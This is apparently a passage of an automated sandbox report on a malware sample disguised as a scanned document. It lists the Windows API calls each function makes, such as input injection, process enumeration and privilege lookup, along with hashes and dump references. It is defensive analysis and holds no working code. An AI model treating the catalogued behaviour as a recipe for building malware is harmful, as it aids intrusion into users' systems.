InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008A53A8

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 0077c2ebab92b3f714f106d35e6fc4e855c89abb7395403b6e41d99f8364dd9f
Instruction ID: 1e9e20cdf1d3294bd825ee9255f0b720e075fe04c585ac9e6155e6fdde2111de
Opcode Fuzzy Hash: 0077c2ebab92b3f714f106d35e6fc4e855c89abb7395403b6e41d99f8364dd9f
Instruction Fuzzy Hash: 5D31BC30A55A0CEFFF249A14CC56BE977A5FB97390F584001FA11D6BE1C7B099C09B42

Function 0087AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 0087ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0087AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0087AC74
SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 0087ACC6

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: fcf8206580bfd3b6b6a68f149f03a694fa7b616059fa42bad8c333780e0183a2
Instruction ID: 6e3cc8169bef93ee6b16cc8db4a581f2a5222ec5adcc1feca24462275a45a528
Opcode Fuzzy Hash: fcf8206580bfd3b6b6a68f149f03a694fa7b616059fa42bad8c333780e0183a2
Instruction Fuzzy Hash: A731E530A00618BFFB2ACB65C805BFE7AA5FBC5320F08C21AE489D21D9C375C9859752

Function 008A7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 008A769A
GetWindowRect.USER32(?,?), ref: 008A7710
PtInRect.USER32(?,?,008A8B89), ref: 008A7720
MessageBeep.USER32(00000000), ref: 008A778C

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: e19c37178fd2f5c4dc14de76c2920d27583b8cf159f9dc467588171697dd4658
Instruction ID: 5e45a9593f3564b9fe6b3d5f01604565b7821b0a96fa1a35beac7e57dc1c0391
Opcode Fuzzy Hash: e19c37178fd2f5c4dc14de76c2920d27583b8cf159f9dc467588171697dd4658
Instruction Fuzzy Hash: C0418B34A09254DFEB01DF58CC98EA9BBF5FB4A314F1940A8E914DFA61D730A941DF90

Function 008A16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 008A16EB

Part of subcall function 00873A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00873A57
Part of subcall function 00873A3D: GetCurrentThreadId.KERNEL32 ref: 00873A5E
Part of subcall function 00873A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008725B3), ref: 00873A65

GetCaretPos.USER32(?), ref: 008A16FF
ClientToScreen.USER32(00000000,?), ref: 008A174C
GetForegroundWindow.USER32 ref: 008A1752

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 93b50d38704a9c82858349d586bbf17cdcb464296c28b17c38a4b39cc0612bdd
Instruction ID: e4fc89d3d97fcea4a51578b8904faf9ff7dc9092e23ea4bdbc322ba48e2b21ab
Opcode Fuzzy Hash: 93b50d38704a9c82858349d586bbf17cdcb464296c28b17c38a4b39cc0612bdd
Instruction Fuzzy Hash: C3312C75D00249AFDB00EFA9C8858EEBBFDFF49304B5080A9E415E7611EA31DE45CBA1

Function 0087D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0087D501
Process32FirstW.KERNEL32(00000000,?), ref: 0087D50F
Process32NextW.KERNEL32(00000000,?), ref: 0087D52F
CloseHandle.KERNEL32(00000000), ref: 0087D5DC

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: ab51eaba2adedc8faca6c57d1b0832d2d2dd19f1b349df4d2e46a583e70553e7
Instruction ID: 5e645767f5cd8c65a4aeac6905b591086d8938d69c980a33b43514ca7f427a0d
Opcode Fuzzy Hash: ab51eaba2adedc8faca6c57d1b0832d2d2dd19f1b349df4d2e46a583e70553e7
Instruction Fuzzy Hash: DA318C711083009FD300EF58C881AAABBF8FF99344F10492DF585C21A1EB619985CB93

Function 008A8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00829BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00829BB2

GetCursorPos.USER32(?), ref: 008A9001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00867711,?,?,?,?,?), ref: 008A9016
GetCursorPos.USER32(?), ref: 008A905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00867711,?,?,?), ref: 008A9094

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 802ae1c3accfb1fb24e8e784ca2e05d0968f9a3f3b79b9ea6641d144f2789ecb
Instruction ID: 37203aff76f6772b7496d162f0d39eda045ff7b5586eb3444ab0e87a13f11ac5
Opcode Fuzzy Hash: 802ae1c3accfb1fb24e8e784ca2e05d0968f9a3f3b79b9ea6641d144f2789ecb
Instruction Fuzzy Hash: 4D21BF35600418EFEF258F94C898EEA7BF9FB4A3A0F104065F9458B661C3319990DB60

Function 0087D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,008ACB68), ref: 0087D2FB
GetLastError.KERNEL32 ref: 0087D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0087D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,008ACB68), ref: 0087D376

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 1da8667c7786cd399d4d30a26973308c83160d3d8297c2878514bb7639ccaff9
Instruction ID: 54524df990ed233b841e45423b6238b2ed6baa6227f45b31dfa8d05ebd821971
Opcode Fuzzy Hash: 1da8667c7786cd399d4d30a26973308c83160d3d8297c2878514bb7639ccaff9
Instruction Fuzzy Hash: 012151705093019F8710DF28C8818AA77F8FE56768F508A1DF4A9C73A1EB31D946CB93

Function 00871571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00871014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0087102A
Part of subcall function 00871014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00871036
Part of subcall function 00871014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00871045
Part of subcall function 00871014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0087104C
Part of subcall function 00871014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00871062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008715BE
_memcmp.LIBVCRUNTIME ref: 008715E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00871617
HeapFree.KERNEL32(00000000), ref: 0087161E

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: d8f67d9c109542e4c6189ec2a4df19a35806e38819ed02f636a3e77cfe7caee3
Instruction ID: e1847ddd93bb3e6c3e97eeefebf7608d05226d2cfdce96467c4c34756ebe5688
Opcode Fuzzy Hash: d8f67d9c109542e4c6189ec2a4df19a35806e38819ed02f636a3e77cfe7caee3
Instruction Fuzzy Hash: 72215531E00108ABDF14DFA8C949BEEB7B8FF94344F188459E449EB645E730AA05DBA0

Function 008A2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 008A280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 008A2824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 008A2832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 008A2840

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 7f6def8dc8cfc4bbceef1a75b895b29c8670269b7b5e75e4493df644e6d4564e
Instruction ID: 9bbc0fe5c44e02afb23a26ae2828b828ef227f5f535d77ddd4a5b4c5d4aeefc5
Opcode Fuzzy Hash: 7f6def8dc8cfc4bbceef1a75b895b29c8670269b7b5e75e4493df644e6d4564e
Instruction Fuzzy Hash: 0121D631604515AFE724DB28C844FAA7799FF46324F148158F426CBAD2CB75FD82C791

Function 008778F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00878D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0087790A,?,000000FF,?,00878754,00000000,?,0000001C,?,?), ref: 00878D8C
Part of subcall function 00878D7D: lstrcpyW.KERNEL32(00000000,?,?,0087790A,?,000000FF,?,00878754,00000000,?,0000001C,?,?,00000000), ref: 00878DB2
Part of subcall function 00878D7D: lstrcmpiW.KERNEL32(00000000,?,0087790A,?,000000FF,?,00878754,00000000,?,0000001C,?,?), ref: 00878DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00878754,00000000,?,0000001C,?,?,00000000), ref: 00877923
lstrcpyW.KERNEL32(00000000,?,?,00878754,00000000,?,0000001C,?,?,00000000), ref: 00877949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00878754,00000000,?,0000001C,?,?,00000000), ref: 00877984

Strings

cdecl, xrefs: 0087797B

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 1fb7897d12bb3f9a9d5c877d8846bf17ba5368117ea328e958f302133fbc3c55
Instruction ID: 6f7c5b75f43cd821c646bfaeba85ce21e971f0e5142ec2e2b341117d9f828401
Opcode Fuzzy Hash: 1fb7897d12bb3f9a9d5c877d8846bf17ba5368117ea328e958f302133fbc3c55
Instruction Fuzzy Hash: 5511D63A201201ABDB155F38D845E7A7BA9FF95350B50802AFA4ACB368EB35D811D791

Function 008A7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 008A7D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 008A7D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 008A7D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0088B7AD,00000000), ref: 008A7D6B

Part of subcall function 00829BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00829BB2

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 79504c950d7234db5e68035243993189fd9a2a9f87de340fb081938df71cca93
Instruction ID: 89bb729273058218c7ad3c90d4f201cd902f36a574f83983d7d59ac7c618b2dd
Opcode Fuzzy Hash: 79504c950d7234db5e68035243993189fd9a2a9f87de340fb081938df71cca93
Instruction Fuzzy Hash: 4E11A231604665AFEB109F28CC08A6A3BA5FF47370B154728F835DB6F0E7309950DB50

Function 008A5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 008A56BB
_wcslen.LIBCMT ref: 008A56CD
_wcslen.LIBCMT ref: 008A56D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 008A5816

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: cfc0959a789f41a619c80e8ee77ef59740836dbd3523c96c304e6cdde703f927
Instruction ID: 2c41c547b402ba1ecd8245d7faee0a8443883dd5996f5d04bbb0c5c77d5a45cf
Opcode Fuzzy Hash: cfc0959a789f41a619c80e8ee77ef59740836dbd3523c96c304e6cdde703f927
Instruction Fuzzy Hash: 7711E471600A18A6EF20DF65DC85AEE3B6CFF16764F104026F915D6481EB7489C0CBA5

Function 00871A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00871A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00871A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00871A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00871A8A

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 216ca4fb950dc030157d9e5b0d35c3b597bfbcc100f6239a4354c09cf711a1aa
Instruction ID: fb5fde697ae645fcad23c2c298370b157a69ab05346f17c271405f9ff8a0a19c
Opcode Fuzzy Hash: 216ca4fb950dc030157d9e5b0d35c3b597bfbcc100f6239a4354c09cf711a1aa
Instruction Fuzzy Hash: F211183A901229BFEF109BA88985FADFB78FB14750F204091E604B7294D671AE509B94

Function 0087E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0087E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0087E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0087E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0087E24D

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: b7def3bfc5ff49444ee988c3f04f27ccaa2fcb467596e5e36079eeab1e31d691
Instruction ID: 77a5064ba95d423b978095cb804219649e47c058c7e0e9f77e401e263b7ce2cc
Opcode Fuzzy Hash: b7def3bfc5ff49444ee988c3f04f27ccaa2fcb467596e5e36079eeab1e31d691
Instruction Fuzzy Hash: 30112B72A04258BBDB019FA89C49A9F7FACFB46315F008255F828D7395D774CD0087A0

Function 0083D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0083CFF9,00000000,00000004,00000000), ref: 0083D218
GetLastError.KERNEL32 ref: 0083D224
__dosmaperr.LIBCMT ref: 0083D22B
ResumeThread.KERNEL32(00000000), ref: 0083D249

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: da2e0f283d007c36e2b3fccf6a900bf368fdbbdbc8bd140bd4ca7a5c8f464bbe
Instruction ID: 8d5bb60d8960a5651c0f9fae930802bee3ae347f43d13a1c569f81bd338128be
Opcode Fuzzy Hash: da2e0f283d007c36e2b3fccf6a900bf368fdbbdbc8bd140bd4ca7a5c8f464bbe
Instruction Fuzzy Hash: 7F01C036805208BBDB215BA9EC09AAF7A69FFC2731F104229F925D21D1CF719901C6E1

Function 0081600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0081604C
GetStockObject.GDI32(00000011), ref: 00816060
SendMessageW.USER32(00000000,00000030,00000000), ref: 0081606A

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: f98cb10c6f42464350d607d70f5cd10c59bbb080bce9bf8a812bf6998f532a7e
Instruction ID: dc22e2270e1e73e54e7b9313f03b35b6d3b4378cf3e1b16d65ee66283a0090fd
Opcode Fuzzy Hash: f98cb10c6f42464350d607d70f5cd10c59bbb080bce9bf8a812bf6998f532a7e
Instruction Fuzzy Hash: 02116172501948BFEF129F949C44EEA7BADFF1D364F040115FA54A2110D732DCA0DB90

Function 00833B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00833B56

Part of subcall function 00833AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00833AD2
Part of subcall function 00833AA3: ___AdjustPointer.LIBCMT ref: 00833AED

_UnwindNestedFrames.LIBCMT ref: 00833B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00833B7C
CallCatchBlock.LIBVCRUNTIME ref: 00833BA4

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: f2d0ce4de731a3d39ffe9c9cb3b120496c0fb00301fa09308771886bbdf8b20d
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
